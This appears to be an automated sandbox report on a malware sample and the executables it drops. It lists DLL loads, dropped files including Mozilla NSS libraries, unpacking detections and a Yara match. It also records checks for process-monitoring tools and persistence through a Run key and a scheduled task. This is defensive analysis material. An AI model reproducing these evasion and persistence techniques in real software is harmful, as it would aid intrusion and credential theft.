                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: msimg32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: msvcr100.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: msimg32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: msvcr100.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeSection loaded: netutils.dll
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                          Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmp
                          Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmp
                          Source: Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdbV source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdb source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmp
                          Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmp

                          Data Obfuscation

                          barindex
                          Detected unpacking (changes PE section rights)
                          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tohi:R;.diducow:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\userGDHIIIIEHC.exeUnpacked PE file: 6.2.userGDHIIIIEHC.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tvrujsnp:EW;vpziaunm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tvrujsnp:EW;vpziaunm:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeUnpacked PE file: 23.2.RoamingCBGCBGCAFI.exe.d50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qhedmxhi:EW;aflvgrfd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qhedmxhi:EW;aflvgrfd:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 42.2.explorti.exe.ab0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tvrujsnp:EW;vpziaunm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tvrujsnp:EW;vpziaunm:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeUnpacked PE file: 43.2.axplong.exe.6a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qhedmxhi:EW;aflvgrfd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qhedmxhi:EW;aflvgrfd:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeUnpacked PE file: 47.2.4ddf12fb51.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tohi:R;.diducow:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeUnpacked PE file: 50.2.4ddf12fb51.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tohi:R;.diducow:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                          Detected unpacking (overwrites its own PE header)
                          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack
                          Source: C:\Users\userCFHCBKKFIJ.exeUnpacked PE file: 9.2.userCFHCBKKFIJ.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeUnpacked PE file: 47.2.4ddf12fb51.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeUnpacked PE file: 50.2.4ddf12fb51.exe.400000.0.unpack
                          Yara detected Babadeda
                          Source: Yara matchFile source: 9.2.userCFHCBKKFIJ.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 9.0.userCFHCBKKFIJ.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Users\userCFHCBKKFIJ.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\go[1].exe, type: DROPPED
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004195E0
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                          Source: explorti.exe.6.drStatic PE information: real checksum: 0x1dc7e1 should be: 0x1d3053
                          Source: axplong.exe.23.drStatic PE information: real checksum: 0x1d8d3e should be: 0x1d82f7
                          Source: num[1].exe.45.drStatic PE information: real checksum: 0x0 should be: 0x3c235
                          Source: userCFHCBKKFIJ.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x22ea9
                          Source: RoamingCBGCBGCAFI.exe.0.drStatic PE information: real checksum: 0x1d8d3e should be: 0x1d82f7
                          Source: amadka[1].exe.0.drStatic PE information: real checksum: 0x1dc7e1 should be: 0x1d3053
                          Source: go[1].exe.0.drStatic PE information: real checksum: 0x0 should be: 0x22ea9
                          Source: userGDHIIIIEHC.exe.0.drStatic PE information: real checksum: 0x1dc7e1 should be: 0x1d3053
                          Source: file.exeStatic PE information: section name: .tohi
                          Source: file.exeStatic PE information: section name: .diducow
                          Source: mozglue[1].dll.0.drStatic PE information: section name: .00cfg
                          Source: msvcp140.dll.0.drStatic PE information: section name: .didat
                          Source: msvcp140[1].dll.0.drStatic PE information: section name: .didat
                          Source: nss3.dll.0.drStatic PE information: section name: .00cfg
                          Source: nss3[1].dll.0.drStatic PE information: section name: .00cfg
                          Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
                          Source: softokn3[1].dll.0.drStatic PE information: section name: .00cfg
                          Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
                          Source: freebl3[1].dll.0.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
                          Source: userGDHIIIIEHC.exe.0.drStatic PE information: section name:
                          Source: userGDHIIIIEHC.exe.0.drStatic PE information: section name: .idata
                          Source: userGDHIIIIEHC.exe.0.drStatic PE information: section name:
                          Source: userGDHIIIIEHC.exe.0.drStatic PE information: section name: tvrujsnp
                          Source: userGDHIIIIEHC.exe.0.drStatic PE information: section name: vpziaunm
                          Source: userGDHIIIIEHC.exe.0.drStatic PE information: section name: .taggant
                          Source: amadka[1].exe.0.drStatic PE information: section name:
                          Source: amadka[1].exe.0.drStatic PE information: section name: .idata
                          Source: amadka[1].exe.0.drStatic PE information: section name:
                          Source: amadka[1].exe.0.drStatic PE information: section name: tvrujsnp
                          Source: amadka[1].exe.0.drStatic PE information: section name: vpziaunm
                          Source: amadka[1].exe.0.drStatic PE information: section name: .taggant
                          Source: userCFHCBKKFIJ.exe.0.drStatic PE information: section name: .code
                          Source: go[1].exe.0.drStatic PE information: section name: .code
                          Source: RoamingCBGCBGCAFI.exe.0.drStatic PE information: section name:
                          Source: RoamingCBGCBGCAFI.exe.0.drStatic PE information: section name: .idata
                          Source: RoamingCBGCBGCAFI.exe.0.drStatic PE information: section name:
                          Source: RoamingCBGCBGCAFI.exe.0.drStatic PE information: section name: qhedmxhi
                          Source: RoamingCBGCBGCAFI.exe.0.drStatic PE information: section name: aflvgrfd
                          Source: RoamingCBGCBGCAFI.exe.0.drStatic PE information: section name: .taggant
                          Source: random[1].exe.0.drStatic PE information: section name: .tohi
                          Source: random[1].exe.0.drStatic PE information: section name: .diducow
                          Source: explorti.exe.6.drStatic PE information: section name:
                          Source: explorti.exe.6.drStatic PE information: section name: .idata
                          Source: explorti.exe.6.drStatic PE information: section name:
                          Source: explorti.exe.6.drStatic PE information: section name: tvrujsnp
                          Source: explorti.exe.6.drStatic PE information: section name: vpziaunm
                          Source: explorti.exe.6.drStatic PE information: section name: .taggant
                          Source: gmpopenh264.dll.tmp.18.drStatic PE information: section name: .rodata
                          Source: axplong.exe.23.drStatic PE information: section name:
                          Source: axplong.exe.23.drStatic PE information: section name: .idata
                          Source: axplong.exe.23.drStatic PE information: section name:
                          Source: axplong.exe.23.drStatic PE information: section name: qhedmxhi
                          Source: axplong.exe.23.drStatic PE information: section name: aflvgrfd
                          Source: axplong.exe.23.drStatic PE information: section name: .taggant
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A9F5 push ecx; ret 0_2_0041AA08
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA5B536 push ecx; ret 0_2_6CA5B549
                          Source: file.exeStatic PE information: section name: .text entropy: 7.724016513363016
                          Source: userGDHIIIIEHC.exe.0.drStatic PE information: section name: entropy: 7.976881100492608
                          Source: userGDHIIIIEHC.exe.0.drStatic PE information: section name: tvrujsnp entropy: 7.95392890585138
                          Source: amadka[1].exe.0.drStatic PE information: section name: entropy: 7.976881100492608
                          Source: amadka[1].exe.0.drStatic PE information: section name: tvrujsnp entropy: 7.95392890585138
                          Source: RoamingCBGCBGCAFI.exe.0.drStatic PE information: section name: entropy: 7.983905587000576
                          Source: RoamingCBGCBGCAFI.exe.0.drStatic PE information: section name: qhedmxhi entropy: 7.954227891194689
                          Source: random[1].exe.0.drStatic PE information: section name: .text entropy: 7.724016513363016
                          Source: explorti.exe.6.drStatic PE information: section name: entropy: 7.976881100492608
                          Source: explorti.exe.6.drStatic PE information: section name: tvrujsnp entropy: 7.95392890585138
                          Source: axplong.exe.23.drStatic PE information: section name: entropy: 7.983905587000576
                          Source: axplong.exe.23.drStatic PE information: section name: qhedmxhi entropy: 7.954227891194689
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeFile created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\go[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\userGDHIIIIEHC.exeJump to dropped file
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)Jump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\userCFHCBKKFIJ.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\num[1].exeJump to dropped file
                          Source: C:\Users\userGDHIIIIEHC.exeFile created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\amadka[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                          Boot Survival

                          barindex
                          Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                          Source: C:\Users\userGDHIIIIEHC.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\userGDHIIIIEHC.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ddf12fb51.exe
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ddf12fb51.exe
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAd